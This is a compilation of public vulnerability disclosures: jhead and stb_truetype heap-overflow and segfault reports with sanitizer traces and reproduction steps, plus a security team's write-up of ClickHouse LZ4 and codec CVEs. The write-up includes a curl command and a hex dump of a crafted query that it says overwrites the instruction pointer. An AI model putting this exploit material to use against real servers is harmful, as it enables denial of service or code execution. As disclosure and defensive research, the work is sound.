A Heap-based Buffer Overflow vulnerabilty exists in jhead 3.04 and 3.05 is affected by: Buffer Overflow via the RemoveUnknownSections function in jpgfile.c.

Description of problem:

A heap-based buffer overflow Read in RemoveUnknownSections in jpgfile.c

Version-Release number of selected component (if applicable):

I tested the following version:  
Jhead version: 3.05  
Jhead version: 3.04

How reproducible:

git clone --depth=1 https://github.com/Matthias-Wandel/jhead.git && cd jhead && make CC="clang" -e CFLAGS="-g -fsanitize=address" -e LDFLAGS="-g -fsanitize=address"

Steps to Reproduce:  
1.just run the following command

    ./jhead -purejpg ./tests_61787.jpg
    

poc：tests\_61787.zip

Actual results:

AddressSanitizer Report

    $ ./jhead -purejpg ./tests_61787.jpg
    
    Nonfatal Error : './tests_61787.jpg' Extraneous 10 padding bytes before section C4
    =================================================================
    ==26268==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60e0000000e0 at pc 0x000000494f5f bp 0x7ffead788260 sp 0x7ffead787a28
    READ of size 80 at 0x60e0000000e0 thread T0
        #0 0x494f5e in __asan_memmove (/root/fuzz/jhead/test/jhead+0x494f5e)
        #1 0x4d172e in RemoveUnknownSections /root/fuzz/jhead/jpgfile.c:718:17
        #2 0x4ca6d4 in ProcessFile /root/fuzz/jhead/jhead.c:1182:13
        #3 0x4c74e5 in main /root/fuzz/jhead/jhead.c:1759:13
        #4 0x7fc36297383f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291
        #5 0x41b858 in _start (/root/fuzz/jhead/test/jhead+0x41b858)
    
    0x60e0000000e0 is located 0 bytes to the right of 160-byte region [0x60e000000040,0x60e0000000e0)
    allocated by thread T0 here:
        #0 0x4959c9 in realloc (/root/fuzz/jhead/test/jhead+0x4959c9)
        #1 0x4cf59f in CheckSectionsAllocated /root/fuzz/jhead/jpgfile.c:107:33
        #2 0x4ce3c0 in ReadJpegSections /root/fuzz/jhead/jpgfile.c:139:9
        #3 0x4cfd96 in ReadJpegFile /root/fuzz/jhead/jpgfile.c:381:11
        #4 0x4c8850 in ProcessFile /root/fuzz/jhead/jhead.c:908:10
        #5 0x4c74e5 in main /root/fuzz/jhead/jhead.c:1759:13
        #6 0x7fc36297383f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow (/root/fuzz/jhead/test/jhead+0x494f5e) in __asan_memmove
    Shadow bytes around the buggy address:
      0x0c1c7fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c1c7fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c1c7fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c1c7fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c1c7fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
    =>0x0c1c7fff8010: 00 00 00 00 00 00 00 00 00 00 00 00[fa]fa fa fa
      0x0c1c7fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c1c7fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c1c7fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c1c7fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c1c7fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==26268==ABORTING
    

Additional info:

Founder: giantbranch of NSFOCUS Security Team

CVE-2021-28277: A heap-based buffer overflow Read in RemoveUnknownSections in jpgfile.c · Issue #16 · Matthias-Wandel/jhead

A Denial of Service vulnerability exists in jhead 3.04 and 3.05 due to a wild address read in the Get16u function in exif.c in will cause segmentation fault via a crafted_file.

Description of problem:

Multiple Segmentation fault in jhead via a crafted jpg file

Version-Release number of selected component (if applicable):

I tested the following version:  
Jhead version: 3.05  
Jhead version: 3.04

How reproducible:

git clone --depth=1 https://github.com/Matthias-Wandel/jhead.git && cd jhead && make CC="clang" -e CFLAGS="-g -fsanitize=address" -e LDFLAGS="-g -fsanitize=address"

Steps to Reproduce:  
1.just run the following command

Segmentation fault in ProcessCanonMakerNoteDir

    ./jhead -v ./tests_61418.jpg
    

Segmentation fault in Get16u

    ./jhead -v ./tests_61761.jpg
    

Segmentation fault in Get32s

    ./jhead -v ./tests_61763.jpg
    

poc：  
jhead-multi-seg.zip

They are all because of wild-addr-read.

Actual results:

Segmentation fault in ProcessCanonMakerNoteDir

    $ ./jhead -v ./tests_61418.jpg
    Exif header 7166 bytes long
    Exif section in Intel order
    (dir has 9 entries)
        Make = "Canon"
        Model = "Canon DIGITAL IXUS?"
        Orientation = 1
        XResolution = 180/1
        YResolution = 180/1
        ResolutionUnit = 2
        DateTime = "2001:06:09 15:17:32"
        YCbCrPositioning = 1
        ExifOffset = 184
        Exif Dir:(dir has 27 entries)
            ExposureTime = 1/350
            FNumber = 40/10
            ExifVersion = "0210"
            DateTimeOriginal = "2001:06:09 15:17:32"
            DateTimeDigitized = "2001:06:09 15:17:32"
            ComponentsConfiguration = "?"
            CompressedBitsPerPixel = 3/1
            ShutterSpeedValue = 553859/65536
            ApertureValue = 262144/65536
            ExposureBiasValue = 0/3
            MaxApertureValue = 194698/65536
            SubjectDistance = 3750/1000
            MeteringMode = 2
            Flash = 0
            FocalLength = 346/32
            Maker note: (dir has 10 entries)
                Canon maker tag 0001 Value = 0, 1024, 6, 0, 9728, 512, 0, 768, 256, 0, 0, 256, 0, 256, 512, 256, ...
                Canon maker tag 0002 Value = 0, 0, 0, 256
                Canon maker tag 0003 Value = 512, 23040, 54017, 40448
                Canon maker tag 0004 Value = 0, 0, 0, 0, 7680, 0, 35840, 512, 32769, 3584, 1, 0, 0, 256, 1024
                Canon maker tag 0000 Value = 0, 0, 0, 512, 48, 0
                Canon maker tag 0006 Value = "IMG:JPEG file"
    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==25461==ERROR: AddressSanitizer: SEGV on unknown address 0x624100002100 (pc 0x0000004dfa3c bp 0x7ffe87baf3b0 sp 0x7ffe87baf2d0 T0)
    ==25461==The signal is caused by a READ memory access.
        #0 0x4dfa3c in ProcessCanonMakerNoteDir /root/fuzz/jhead/makernote.c:105:29
        #1 0x4df3ea in ProcessMakerNote /root/fuzz/jhead/makernote.c:189:9
        #2 0x4d57e9 in ProcessExifDir /root/fuzz/jhead/exif.c:559:13
        #3 0x4d7adf in ProcessExifDir /root/fuzz/jhead/exif.c:851:25
        #4 0x4d494a in process_EXIF /root/fuzz/jhead/exif.c:1040:5
        #5 0x4cf08d in ReadJpegSections /root/fuzz/jhead/jpgfile.c:289:25
        #6 0x4cfd96 in ReadJpegFile /root/fuzz/jhead/jpgfile.c:381:11
        #7 0x4c8850 in ProcessFile /root/fuzz/jhead/jhead.c:908:10
        #8 0x4c74e5 in main /root/fuzz/jhead/jhead.c:1759:13
        #9 0x7fb2b1d2083f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291
        #10 0x41b858 in _start (/root/fuzz/jhead/jhead+0x41b858)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /root/fuzz/jhead/makernote.c:105:29 in ProcessCanonMakerNoteDir
    ==25461==ABORTING
    

Segmentation fault in Get16u

    $ ./jhead -v ./tests_61761.jpg
    Exif header 7166 bytes long
    Exif section in Intel order
    (dir has 213 entries)
        Make = "Canon"
    
    Nonfatal Error : './tests_61761.jpg' Illegal value pointer for tag 0110 in Exif
        Unknown Tag 6112 Value = 1
    
    Nonfatal Error : './tests_61761.jpg' Illegal value pointer for tag e21a in Exif
    
    Nonfatal Error : './tests_61761.jpg' Illegal value pointer for tag 011b in Exif
        Unknown Tag 9e28 Value = 2
        DateTime = "2001:06:09 1>:17:32"
        YCbCrPositioning = 1
        ExifOffset = 184
    ............
    ............
    ............
    ............
    ............
    ............
    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==25463==ERROR: AddressSanitizer: SEGV on unknown address 0x6241000011b7 (pc 0x0000004d399c bp 0x7ffc7716b130 sp 0x7ffc7716b0e0 T0)
    ==25463==The signal is caused by a READ memory access.
        #0 0x4d399c in Get16u /root/fuzz/jhead/exif.c:323:17
        #1 0x4d40e1 in PrintFormatNumber /root/fuzz/jhead/exif.c:378:45
        #2 0x4dfbdd in ProcessCanonMakerNoteDir /root/fuzz/jhead/makernote.c:123:21
        #3 0x4df3ea in ProcessMakerNote /root/fuzz/jhead/makernote.c:189:9
        #4 0x4d57e9 in ProcessExifDir /root/fuzz/jhead/exif.c:559:13
        #5 0x4d7adf in ProcessExifDir /root/fuzz/jhead/exif.c:851:25
        #6 0x4d7adf in ProcessExifDir /root/fuzz/jhead/exif.c:851:25
        #7 0x4d494a in process_EXIF /root/fuzz/jhead/exif.c:1040:5
        #8 0x4cf08d in ReadJpegSections /root/fuzz/jhead/jpgfile.c:289:25
        #9 0x4cfd96 in ReadJpegFile /root/fuzz/jhead/jpgfile.c:381:11
        #10 0x4c8850 in ProcessFile /root/fuzz/jhead/jhead.c:908:10
        #11 0x4c74e5 in main /root/fuzz/jhead/jhead.c:1759:13
        #12 0x7f45bf8ba83f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291
        #13 0x41b858 in _start (/root/fuzz/jhead/jhead+0x41b858)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /root/fuzz/jhead/exif.c:323:17 in Get16u
    ==25463==ABORTING
    

Segmentation fault in Get32s

    $ ./jhead -v ./tests_61763.jpg
    Exif header 7166 bytes long
    Exif section in Intel order
    (dir has 42 entries)
        Make = "Canon"
        Model = "?anon DIGITAL IXUS?"
        Orientation = 1
        XResolution = 180/1
        YResolution = 180/1
        ResolutionUnit = 2
        DateTime = "2001:06:09 15:17:32"
        YCbCrPositioning = 1
        ExifOffset = 184
        Exif Dir:(dir has 27 e
    ............
    ............
    ............
    ............
    ............
    ............
    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==25465==ERROR: AddressSanitizer: SEGV on unknown address 0x62410000200b (pc 0x0000004d3bc8 bp 0x7ffe1275af10 sp 0x7ffe1275ae80 T0)
    ==25465==The signal is caused by a READ memory access.
        #0 0x4d3bc8 in Get32s /root/fuzz/jhead/exif.c:336:18
        #1 0x4d419b in PrintFormatNumber /root/fuzz/jhead/exif.c:388:32
        #2 0x4dfbdd in ProcessCanonMakerNoteDir /root/fuzz/jhead/makernote.c:123:21
        #3 0x4df3ea in ProcessMakerNote /root/fuzz/jhead/makernote.c:189:9
        #4 0x4d57e9 in ProcessExifDir /root/fuzz/jhead/exif.c:559:13
        #5 0x4d7adf in ProcessExifDir /root/fuzz/jhead/exif.c:851:25
        #6 0x4d494a in process_EXIF /root/fuzz/jhead/exif.c:1040:5
        #7 0x4cf08d in ReadJpegSections /root/fuzz/jhead/jpgfile.c:289:25
        #8 0x4cfd96 in ReadJpegFile /root/fuzz/jhead/jpgfile.c:381:11
        #9 0x4c8850 in ProcessFile /root/fuzz/jhead/jhead.c:908:10
        #10 0x4c74e5 in main /root/fuzz/jhead/jhead.c:1759:13
        #11 0x7f88040ac83f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291
        #12 0x41b858 in _start (/root/fuzz/jhead/jhead+0x41b858)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /root/fuzz/jhead/exif.c:336:18 in Get32s
    ==25465==ABORTING
    
    

Additional info:

Founder: giantbranch of NSFOCUS Security Team

CVE-2021-28275: Multiple Segmentation fault in jhead via a crafted jpg file · Issue #17 · Matthias-Wandel/jhead

A Heap-based Buffer Overflow vulnerability exists in jhead 3.04 and 3.05 via the RemoveSectionType function in jpgfile.c.

Description of problem:

A heap-based buffer overflow Read in RemoveSectionType in jpgfile.c

Version-Release number of selected component (if applicable):

I tested the following version:  
Jhead version: 3.05  
Jhead version: 3.04

How reproducible:

git clone --depth=1 https://github.com/Matthias-Wandel/jhead.git && cd jhead && make CC="clang" -e CFLAGS="-g -fsanitize=address" -e LDFLAGS="-g -fsanitize=address"

Steps to Reproduce:  
1.just run the following command

    ./jhead -purejpg ./tests_61786.jpg
    

poc：  
tests\_61786.zip

Actual results:

AddressSanitizer Report

    $ ./jhead -purejpg ./tests_61786.jpg
    =================================================================
    ==26249==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60e0000000e0 at pc 0x000000494f5f bp 0x7ffc20743730 sp 0x7ffc20742ef8
    READ of size 160 at 0x60e0000000e0 thread T0
        #0 0x494f5e in __asan_memmove (/root/fuzz/jhead/jhead+0x494f5e)
        #1 0x4d14ff in RemoveSectionType /root/fuzz/jhead/jpgfile.c:669:13
        #2 0x4ca649 in ProcessFile /root/fuzz/jhead/jhead.c:1173:13
        #3 0x4c74e5 in main /root/fuzz/jhead/jhead.c:1759:13
        #4 0x7fc05b29283f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291
        #5 0x41b858 in _start (/root/fuzz/jhead/jhead+0x41b858)
    
    0x60e0000000e0 is located 0 bytes to the right of 160-byte region [0x60e000000040,0x60e0000000e0)
    allocated by thread T0 here:
        #0 0x4959c9 in realloc (/root/fuzz/jhead/jhead+0x4959c9)
        #1 0x4cf59f in CheckSectionsAllocated /root/fuzz/jhead/jpgfile.c:107:33
        #2 0x4ce3c0 in ReadJpegSections /root/fuzz/jhead/jpgfile.c:139:9
        #3 0x4cfd96 in ReadJpegFile /root/fuzz/jhead/jpgfile.c:381:11
        #4 0x4c8850 in ProcessFile /root/fuzz/jhead/jhead.c:908:10
        #5 0x4c74e5 in main /root/fuzz/jhead/jhead.c:1759:13
        #6 0x7fc05b29283f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow (/root/fuzz/jhead/jhead+0x494f5e) in __asan_memmove
    Shadow bytes around the buggy address:
      0x0c1c7fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c1c7fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c1c7fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c1c7fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c1c7fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
    =>0x0c1c7fff8010: 00 00 00 00 00 00 00 00 00 00 00 00[fa]fa fa fa
      0x0c1c7fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c1c7fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c1c7fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c1c7fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c1c7fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==26249==ABORTING
    

Additional info:

Founder: giantbranch of NSFOCUS Security Team

CVE-2021-28278: A heap-based buffer overflow Read in RemoveSectionType in jpgfile.c · Issue #15 · Matthias-Wandel/jhead

** DISPUTED ** stb_truetype.h v1.26 was discovered to contain a heap-buffer-overflow via the function ttUSHORT() at stb_truetype.h. NOTE: Third party has disputed stating that the source code has also a disclaimer that it should only be used with trusted input.

**Describe**  
A heap-buffer-overflow was discovered in stb\_truetype. The issue is being triggered in function ttUSHORT() at stb\_truetype.h:1286  
**To Reproduce**  
test program

    #include <stdio.h>  
    #include <stdlib.h>
    #define STB_IMAGE_WRITE_IMPLEMENTATION
    #include "stb_image_write.h"
    #define STB_TRUETYPE_IMPLEMENTATION
    #include "stb_truetype.h"
    int main(int argc, const char *argv[])
    {
        long int size = 0;
        unsigned char *fontBuffer = NULL;
        FILE *fontFile = fopen(argv[1], "rb");
        if (fontFile == NULL)
        {
            printf("Can not open font file!\n");
            return 0;
        }
        fseek(fontFile, 0, SEEK_END);
        size = ftell(fontFile);   
        fseek(fontFile, 0, SEEK_SET); 
        fontBuffer = calloc(size, sizeof(unsigned char));
        fread(fontBuffer, size, 1, fontFile);
        fclose(fontFile);
        stbtt_fontinfo info;
        if (!stbtt_InitFont(&info, fontBuffer, 0))
        {
            printf("stb init font failed\n");
        }
        int bitmap_w = 512; 
        int bitmap_h = 128;
        free(fontBuffer);
        return 0;
    }  
    

Compile test program with address sanitizer with this command:

AFL_HARDEN=1 afl-gcc -I /src/stb/include  ttf.c -o ttf -lm

You can get program here  
**Asan Reports**  
./Asanttf crash/0  
Get ASan reports

    ==3156==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x63000000ebf0 at pc 0x55ba19faea04 bp 0x7ffc3b853000 sp 0x7ffc3b852ff0
    READ of size 1 at 0x63000000ebf0 thread T0
        #0 0x55ba19faea03 in ttUSHORT /src/stb/include/stb_truetype.h:1286
        #1 0x55ba19faea03 in stbtt_InitFont_internal /src/stb/include/stb_truetype.h:1472
        #2 0x55ba19faea03 in stbtt_InitFont /src/stb/include/stb_truetype.h:4954
        #3 0x55ba19fb01fc in main /src/stb/ttf.c:32
        #4 0x7f443d2b80b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
        #5 0x55ba19f8970d in _start (/src/stb/Asanttf+0x470d)
    
    0x63000000ebf0 is located 1 bytes to the right of 59375-byte region [0x630000000400,0x63000000ebef)
    allocated by thread T0 here:
        #0 0x7f443d686e17 in __interceptor_calloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:154
        #1 0x55ba19fb01c6 in main /src/stb/ttf.c:26
        #2 0x7f443d2b80b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /src/stb/include/stb_truetype.h:1286 in ttUSHORT
    Shadow bytes around the buggy address:
      0x0c607fff9d20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c607fff9d30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c607fff9d40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c607fff9d50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c607fff9d60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c607fff9d70: 00 00 00 00 00 00 00 00 00 00 00 00 00 07[fa]fa
      0x0c607fff9d80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c607fff9d90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c607fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c607fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c607fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==3156==ABORTING
    

**Poc**  
Poc file is here

CVE-2022-25514: heap-buffer-overflow in function ttUSHORT() at stb_truetype.h:1286  · Issue #1286 · nothings/stb

Heap buffer overflow in Clickhouse's LZ4 compression codec when parsing a malicious query. There is no verification that the copy operations in the LZ4::decompressImpl loop and especially the arbitrary copy operation wildCopy<copy_amount>(op, ip, copy_end), don’t exceed the destination buffer’s limits. This issue is very similar to CVE-2021-43304, but the vulnerable copy operation is in a different wildCopy call.

The JFrog Security research team constantly monitors open-source projects to find new vulnerabilities or malicious packages and share them with the wider community to help improve their overall security posture. As part of this effort, the team recently discovered seven new security vulnerabilities in ClickHouse, a widely used open-source Database Management System (DBMS) dedicated to online analytical processing (OLAP). ClickHouse was developed by Yandex for the Yandex.Metrica, a web analytics tool often used to get visual reports and video recordings of user actions, as well as track traffic sources to help evaluate the effectiveness of online and offline advertising. The JFrog Security team responsibly disclosed these vulnerabilities and worked with ClickHouse’s maintainers on verifying the fixes.

The vulnerabilities require authentication, but can be triggered by any user with read permissions. This means the attacker must perform reconnaissance on the specific ClickHouse server target to obtain valid credentials. Any set of credentials would do, since even a user with the lowest privileges can trigger all of the vulnerabilities. By triggering the vulnerabilities, an attacker can crash the ClickHouse server, leak memory contents or even cause remote code execution (RCE).

Following are the seven vulnerabilities the JFrog Security team discovered:

*   **CVE-2021-43304** and **CVE-2021-43305** – heap buffer overflow vulnerabilities in LZ4 compression codec
*   **CVE-2021-42387** and **CVE-2021-42388** – heap out-of-bounds read vulnerabilities in LZ4 compression codec
*   **CVE-2021-42389** – divide by zero in Delta compression codec
*   **CVE-2021-42390** – divide by zero in Delta-Double compression codec
*   **CVE-2021-42391** – divide by zero in Gorilla compression codec

**CVE ID**

**Description**

**Potential Impact**

**CVSSv3.1 Score**

CVE-2021-43304

Heap buffer overflow in LZ4 compression codec when parsing a malicious query

RCE

8.8

CVE-2021-43305

Heap buffer overflow in LZ4 compression codec when parsing a malicious query

RCE

8.8

CVE-2021-42387

Heap out-of-bounds read in LZ4 compression codec when parsing a malicious query

Denial of Service or Information Leakage

7.1

CVE-2021-42388

Heap out-of-bounds read in LZ4 compression codec when parsing a malicious query

Denial of Service or Information Leakage

7.1

CVE-2021-42389

Divide-by-zero in Delta compression codec when parsing a malicious query

Denial of Service

6.5

CVE-2021-42390

Divide-by-zero in DeltaDouble compression codec when parsing a malicious query

Denial of Service

6.5

CVE-2021-42391

Divide-by-zero in Gorilla compression codec when parsing a malicious query

Denial of Service

6.5

**Technical Background**

The ClickHouse server allows a user to compress its queries. A user can pass a compressed query by supplying the **decompress=1** URL query string parameter to its web interface, like so:

    cat query.bin | curl -sS --data-binary @- 'http://serverIP:8123/?user=guest1&password=1234&decompress=1'

Where serverIP is the IP address of the ClickHouse server that has a user “guest1” with password “1234” set up. This user can also be configured with a “readonly” policy.

The query’s content (query.bin) should be in the following format:

    struct {
        uint128_t hash; // Google’s CityHash128
        uint8_t compress_method;
        uint32_t size_compressed_without_checksum; // the length (in bytes) of the entire struct (including compressed_data contents) minus the first 16bytes hash field. 
        uint32_t decompressed_size; // the expected decompressed output size 
        char compressed_data[0]; // the compressed data bytes (variable length)
    };

The client supplies the entire struct to the server and thus controls all of its contents.

The compressed data is consumed by constructing a CompressedReadBuffer instance with the struct as its input.

CompressedReadBuffer’s code calls readCompressedData which reads the struct and extracts its length values, calculates the CityHash128 over the struct contents (excluding the hash field), and verifies it against the struct’s hash field. It then resizes (basically realloc()’s) the initially allocated memory buffer used to hold the decompressed data. Then, through ICompressionCodec::decompress, the selected codec’s doDecompressData is called.

In **CVE-2021-42387**, **CVE-2021-43304**, **CVE-2021-42388** and **CVE-2021-43305** the LZ4 codec calls LZ4::decompress(source, dest, source\_size, dest\_size, ..) with the ‘compressed\_data’ as source, its length as source\_size, the resized memory buffer as dest, and the struct’s ‘decompressed\_size’ value as dest\_size. LZ4::decompress eventually calls LZ4::decompressImpl(source, dest, dest\_size) that does the actual LZ4 decompression in a loop –copying different parts of the compressed input in user-controlled lengths and offsets (supplied as part of the compressed\_data bytes) to the decompressed output memory buffer. It defines pointer variables for tracking the current location in the source (ip) and the dest (op).

**CVE-2021-43304  – a heap buffer overflow vulnerability**

Here is the code of LZ4::decompressImpl() that is relevant for CVE-2021-43304:

    template 
    void NO_INLINE decompressImpl(
         const char * const source,
         char * const dest,
         size_t dest_size)
    {
        ...
        while (true)
        {
            ... 
            wildCopy(op, ip, copy_end);    /// Here we can write up to copy_amount - 1 bytes after buffer.
     
            ip += length;
            op = copy_end;
     
            if (copy_end >= output_end)
                return;
            ...
        }
    }

**ip** is a pointer that points to the compressed buffer and **op** is a pointer that points to the allocated destination buffer, which is allocated with a size of the given decompressed\_size that is passed in the header. **copy\_end** is a pointer that points to the end of the copy area.

**copy\_amount** is the parameter of the template, which can be 8, 16 or 32. The copy area is being copied in chunks that each one of them is in size of **copy\_amount**. For example, this is the implementation of wildCopy16:

    inline void wildCopy16(UInt8 * dst, const UInt8 * src, const UInt8 * dst_end)
    {
        /// Unrolling with clang is doing >10% performance degrade.
    #if defined(__clang__)
        #pragma nounroll
    #endif
        do
        {
            copy16(dst, src);
            dst += 16;
            src += 16;
        } while (dst < dst_end);
    }
    

Since the user controls **decompressed\_size** and the compressed buffer, an attacker can take advantage of this situation by preparing compressed data with a header that contains a decompressed\_size which is smaller than the actual size of the compressed data. Note that the lengths of the overflow, as well as source’s allocation size and the overflowing byte contents are fully controlled by the user, which greatly facilitates exploitation.

Also note that the existing size check of “if (copy\_end >= output\_end)” does not prevent this vulnerability as it appears after the copy operation. CVE-2021-43305 is similar to CVE-2021-43304, but involves a different copy operation (whose source is a controlled offset of the destination buffer).

**Exploiting CVE-2021-43304**

In order to prove the exploitability of CVE-2021-43304, we created a specially crafted compressed file and sent it as previously explained. The query.bin file is comprised of the following header:

*   hash = the matching calculated Cityhash
*   compress\_method = 0x82 (LZ4 method)
*   size\_compressed\_without\_checksum = 0xc80a
*   decompressed\_size = 0x1

And for the compressed data we’ve used ‘\\xff’ (repeating 200 times) ‘A’ (repeating 5100 times). These are arbitrary values. The resulting malformed compressed file:  
00000000  26 fc 61 db c0 83 bb 0a  db 58 5a f0 34 e1 30 f6  |&.a......XZ.4.0.|  
00000010  82 0a c8 00 00 01 00 00  00 f0 ff ff ff ff ff ff  |................|  
00000020  ff ff ff ff ff ff ff ff  ff ff ff ff ff ff ff ff  |................|  
*  
000000e0  ff ff 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |..AAAAAAAAAAAAAA|  
000000f0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|  
*  
0000c81a  
The 200 0xff’s are being used in the loop inside LZ4::decompressImpl():

    template 
    void NO_INLINE decompressImpl(
         const char * const source,
         char * const dest,
         size_t dest_size)
    {
        ...
        while (true)
        {
            ...
            size_t length;
     
            auto continue_read_length = [&]
            {
                unsigned s;
                do
                {
                    s = *ip++;
                    length += s;
                } while (unlikely(s == 255));
            };
     
            /// Get literal length.
     
            const unsigned token = *ip++;
            length = token >> 4;
            if (length == 0x0F)
                continue_read_length();
            
            /// Copy literals.
     
            UInt8 * copy_end = op + length;
     
            ...
     
            wildCopy(op, ip, copy_end);    /// Here we can write up to copy_amount - 1 bytes after buffer.
            ...
        }
    }

That will increase **length** by 0xff \* 200 = 51000, which is exactly the size of the rest of the data.

So although the decompressed size is 1, a much larger size will be copied to the destination.

By sending the query to a vulnerable ClickHouse server, while debugging the server’s process, we managed to periodically get the following crash, proving control of the instruction pointer register, since the code branches to an address taken from the RAX register, which has been overwritten with our “A” values:

Although this specific crash is statistical, we believe that with proper heap shaping techniques, a stable exploit can be developed.

**CVE-2021-42388 and CVE-2021-42387 – heap OOB read vulnerabilities**

In LZ4::decompressImpl():

    template 
    void NO_INLINE decompressImpl(
         const char * const source,
         char * const dest,
         size_t dest_size)
    {
        ...
        while (true)
        {
            ...
            const UInt8 * match = op - offset;
            ...
            if (length > copy_amount * 2)
                wildCopy(op + copy_amount, match + copy_amount, copy_end);
            ...
        }
    }

As part of the LZ4::decompressImpl() loop, a 16-bit unsigned user-supplied value (‘offset’) is read from the compressed\_data. it is subtracted from the current op and stored in **match** pointer (**op** is a pointer that starts as **dest** and moves forward). There is no verification that the **match** pointer is not smaller than **dest**. Later, there’s a copy operation from match to output pointer – possibly **copying out of bounds memory from before the ‘dest’ memory buffer**. Accessing memory outside of the buffer’s bounds can expose sensitive information or lead in certain cases to a crash of the application due to segmentation fault.

CVE-2021-42387 is a similar vulnerability to CVE-2021-42388, which exceeds the upper bounds of the compressed buffer (source) as part of the copy operation.

**CVE-2021-42389, CVE-2021-42390 and CVE-2021-42391 – Divide by zero vulnerabilities**

These are divide-by-zero vulnerabilities in various codecs supported by ClickHouse. They are based on setting the first byte of the compressed buffer (described in the “Technical Background” section above) to zero. The decompression code reads the first byte of the compressed buffer and performs a modulo operation with it to get the remainder:

    UInt8 bytes_size = source[0];
    UInt8 bytes_to_skip = uncompressed_size % bytes_size;

